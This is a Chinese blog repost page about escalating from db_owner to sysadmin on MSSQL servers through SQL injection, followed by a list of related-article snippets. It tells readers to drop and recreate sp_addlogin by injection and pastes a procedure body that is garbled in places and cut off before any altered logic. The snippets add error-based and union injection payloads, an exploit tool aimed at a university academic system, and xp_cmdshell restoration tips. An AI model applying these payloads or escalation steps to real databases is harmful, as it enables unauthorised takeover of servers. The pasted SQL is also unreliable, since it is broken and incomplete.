SQL注入通杀

最新推荐文章于 2021-04-14 02:40:54 发布
转载 最新推荐文章于 2021-04-14 02:40:54 发布 · 372 阅读 · 0
文章标签:

#sql #null #服务器 #存储 #ie

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>

 注入通杀,只要有注入点就有系统权限 
  不知道大家看过这篇文章没有,可以在db_owner角色下添加SYSADMIN帐号,这招真狠啊,存在MSSQL注射漏洞的服务器又要遭殃了。方法主要是利用db_owner可以修改sp_addlogin和sp_addsrvrolemember这两个存储过程,饶过了验证部分。具体方法如下:先输入drop procedure sp_addlogin,然后在IE里面输入create procedure sp_addlogin
  @loginame sysname
  ,@passwd sysname = Null
  ,@defdb ; ; sysname = ’master’ -- UNDONE: DEFAULT
  CONFIGURABLE???
  ,@deflanguage sysname = Null
  ,@sid varbinary(16) = Null
  ,@encryptopt varchar(20) = Null
  AS
  -- SETUP RUNTIME OPTIONS / DECLARE VARIABLES --
  set nocount on
  Declare @ret int -- return value of sp call
  -- DISALLOW USER TRANSACTION --
  set implicit_transactions off
  IF (@@trancount > 0)
  begin
  raiserror(15002,-1,-1,’sp_addlogin’)
  return (1)
  end
  -- VALIDATE LOGIN NAME AS:
  -- (1) Valid SQL Name (SQL LOGIN)
  -- (2) No backslash (NT users only)
  -- (3) Not a reserved login name
  execute @ret = sp_validname @loginame
  if (@ret <> 0)
  return (1)
  if (charindex(’/’, @loginame) > 0)
  begin
  raiserror(15006,-1,-1,@loginame)
  return (1)
  end
  --Note: different case sa is allowed.
  if (@loginame = ’sa’ or lower(@loginame) in (’public’))
  begin
  raiserror(15405, -1 ,-1, @loginame)
  return (1)
  end
  -- LOGIN NAME MUST NOT ALREADY EXIST --
  if exists(select * from master.dbo.syslogins where loginname =
  @loginame)
  begin
  raiserror(15025,-1,-1,@loginame)
  return (1)
  end
  -- VALIDATE DEFAULT DATABASE --
  IF db_id(@defdb) IS NULL
  begin
  raiserror(15010,-1,-1,@defdb)
  return (1)
  end
  -- VALIDATE DEFAULT LANGUAGE --
  IF (@deflanguage IS NOT Null)
  begin
  Execute @ret = sp_validlang @deflanguage
  IF (@ret <> 0)
  return (1)
  end
  ELSE
  begin
  select @deflanguage = name from master.dbo.syslanguages
  where langid = @@default_langid --server default
  language
  if @deflanguage is null
  select @deflanguage = N’us_english’
  end
  -- VALIDATE SID IF GIVEN --
  if ((@sid IS NOT Null) and (datalength(@sid) <> 16))1

〖Python 数据库开发实战 - Python与MySQL交互篇②〗- SQL 注入攻击案例
易编橙 · 终身成长社群,相遇已是上上签!
08-22 4万+
上一章节,我们只是简单的了解了 MySQL Connector 的语法,完成了一个简单的案例。Python 语言操作数据库不是到这里就结束了后续还有很多高级的内容等着我们去学习,该章节我们就来学习一下对所有数据库都有效的 "SQL 注入攻击" 。
SQL注入
m0_53965574的博客
03-14 377
这里写自定义目录标题12种报错注入+万能语句关于POST注入post型盲注通杀payload:关于UPDATEXML,REFERER,COOKIE的构造updatexml报错注入 12种报错注入+万能语句 12种报错注入+万能语句 1、通过floor报错,注入语句如下: and select 1 from (select count(),concat(version(),floor(rand(0)2))x from information_schema.tables group by x)a); 2、通过E
SQL注入攻击通杀
zgqtxwd的专栏
04-26 319
<!--google_ad_client = "pub-2947489232296736";/* 728x15, 创建于 08-4-23MSDN */google_ad_slot = "3624277373";google_ad_width = 728;google_ad_height = 15;//--><script type="text/javascript"
秒杀sql
qq_33002953的博客
05-19 310
CREATE TABLE `goods`( `id` BIGINT(20) NOT NULL AUTO_INCREMENT COMMENT '商品ID', `goods_name` VARCHAR(16) DEFAULT NULL COMMENT '商品名称', `goods_title` VARCHAR(64) DEFAULT NULL COMMENT '商品标题', ...
SQL注入>>>sql-labs通关笔记(完结)
qq_43571759的博客
04-13 917
sql注入好像又是搁置比较久了,一共65关今天将剩下的几关做完了记一下解题过程 less-36 添加单引号登录成功,根据下面提示可知其中单引号被过滤 既然单引号被过滤了,第一反应是宽字节绕过直接上payload 配合联合查询暴库名 ?id=-1%E6' union select 1,version(),database() --+ 源码使用了mysql_real_escape_string函...
SQL注入法***一日通
weixin_34392906的博客
11-19 105
随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入SQL注入是从正常的WWW端口访问,而...
plusrecommend.php,DedeCMSrecommend.php文件通杀SQL注入漏洞原理分析 | 学步园
weixin_42508792的博客
03-11 554
漏洞执行过程1.首先执行到plus/recommand.php,包含了include/common.inc.phprequire_once(dirname(__FILE__)."/../include/common.inc.php");2来看到include/common.inc.phpfunction _RunMagicQuotes(&$svar){if(!get_magic_quote...
qibov7sql注入漏洞通杀
01-08
qibov7sql注入漏洞通杀
msSQL注入通杀 只要有注入点就有系统权限.rar
07-09
【标题】"msSQL注入通杀 只要有注入点就有系统权限"揭示了一个重要的网络安全问题——SQL注入攻击,尤其针对Microsoft SQL Server(msSQL)数据库系统。SQL注入是一种常见的黑客攻击手段,通过在应用程序的输入字段...
php cms 代码注入,PHPCMS全版本通杀SQL注入漏洞
weixin_42458282的博客
04-14 1063
漏洞分析首先看下面的代码/phpcms/modules/member/content.php 202行 edit函数[php]public function edit() {$_username = $this->memberinfo['username'];if(isset($_POST['dosubmit'])) {$catid = $_POST['info']['catid'] = i...
正方教务系统新版sql注入漏洞利用工具
01-19
相信研究过正方教务系统的朋友看到过网上传播的比较多的一篇文章提的/service.asmx中的BMCheckPassword存在注入,然而现在大多数正方教务已经将BMCheckPassword移除了,导致漏洞无法利用。本人研究了/service.asmx中的其它接口,发现zfcwjk1存在同样的注入漏洞,特将注入方法写成工具供大家学习参考。 zfcwjk1似乎是一个财务类的确认接口,利用起来稍微麻烦点,需要一个目标学校的任意学号。 程序执行后,会需要用户输入三个参数。分别是: 1.目标网址 2.目标学校的任意学号 3.年份(估计是用来确定这个学号所在年份的情况,随便填个2012或者2013,不行再换) 若提示“cannot access target url”则可能是目标网址填错了或者教务系统已经将/service.asmx移除了,如果是/service.asmx被移除的话漏洞就没法再利用了。 另外,若是校内网使用则建议挂代理。。。
超级SQL注入工具【SSQLInjection】V1.0 正式版 20180809
10-23
软件运行需要.net framework 4.0,如未安装,请自行百度下载安装。
一个特殊的SQL Server阻塞案例分析
weixin_33795093的博客
11-26 251
上周,在SQL Server数据库下面遇到了一个有意思的SQL阻塞(SQL Blocking)案例。其实个人对SQL Server的阻塞还是颇有研究的。写过好几篇相关文章。 至于这里为什么要总结一下这个案例,因为这个案例有点意思:     1:使用DMV视图捕获到的Blocking SQL为一个查询语句(这个不是真正引起阻塞的源头SQL语句),等待事件为LCK_M_S。   2:出现阻塞的会话非常...
某人收集的MSSQL扩展存储过程恢复方法—非常全面
weixin_34005042的博客
11-18 185
恢复sp_addextendedproc语句: create procedure sp_addextendedproc --- 1996/08/30 20:13 @functname nvarchar(517),/* (owner.)name of function to call */ @dllname varchar(255)/* name of DLL con...
SQL存储过程恢复与删除收集
Yatere的天平秤
05-08 2188
<br /><br />Error Message:未能找到存储过程 'master..xp_cmdshell'。<br />修复法:很通用的,其实碰到 其他126 127的都可以一起修复,<br />除了xplog70.dll其他的都可以用这命令修复<br />xp_cmdshell新的恢复办法 <br />第一步先删除:<br />drop procedure sp_addextendedproc <br />drop procedure sp_oacreate <br />exec sp_dropex
SQL事务的使用
weixin_30394981的博客
12-30 104
一个事务被定义为作为一个单元执行的符合所谓ACID属性的一序列的操作。 原子性 每一个事务是一个工作单元。它不能被分割成更小的部分。这个属性意味着在事务中定义的一切数据更改要么都完成,要么都不完成。 一致性 一个事务不能违背定义在数据库中的任何完整性检查。为了维护一致性,所有的规则、约束、检查和触发都会应用在事务中。由于所有的数据更改在事务期间内进行,这...
转载--关于SQL Server中事务的理解
Alex's Blog
10-28 1394
*******事务全攻略****** 一 事务的属性 事务具有ACID属性 即 Atomic原子性, Consistent一致性, Isolated隔离性, Durable永久性 原子性 就是事务应作为一个工作单元,事务处理完成,所有的工作要么都在数据库中保存下来,要么完全 回滚,全部不保留 一致性 事务完成或者撤销后,都应该处于一致的状态 隔离性 多个事务同时进行,它们之间应该互不干扰.应该防止
事务全攻略
《CSDN社区电子杂志——MS-SQL Server杂志》官方blog
02-01 3492
 1.1.        事务的属性事务具有ACID属性即 Atomic原子性, Consistent一致性, Isolated隔离性, Durable永久性 原子性     就是事务应作为一个工作单元,事务处理完成,所有的工作要么都在数据库中保存下来,要么完全回滚,全部不保留 一致性   事务完成或者撤销后,都应该处于一致的状态 隔离性   多
sql server 事务处理
weixin_33691817的博客
02-18 189
事物处理 事务是SQL Server中的单个逻辑单元,一个事务内的所有SQL语句作为一个整体执行,要么全部执行,要么都不执行。 事务有4个属性,称为ACID(原子性、一致性、隔离性和持久性) 原子性 事务必须是原子工作单元。对于其数据修改,要么全都执行,要么全都不执行。 一致性 事务在完成时,必须使所有的数据都保持一致状态。 隔离性 由并发事务所做的修改必须与任何...
sp password mysql_sql2000 sp_password 错误
weixin_42515796的博客
02-11 151
create procedure sp_password@old sysname = NULL, -- the old (current) password@new sysname, -- the new password@loginame sysname = NULL -- user to change password onas-- SETUP ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值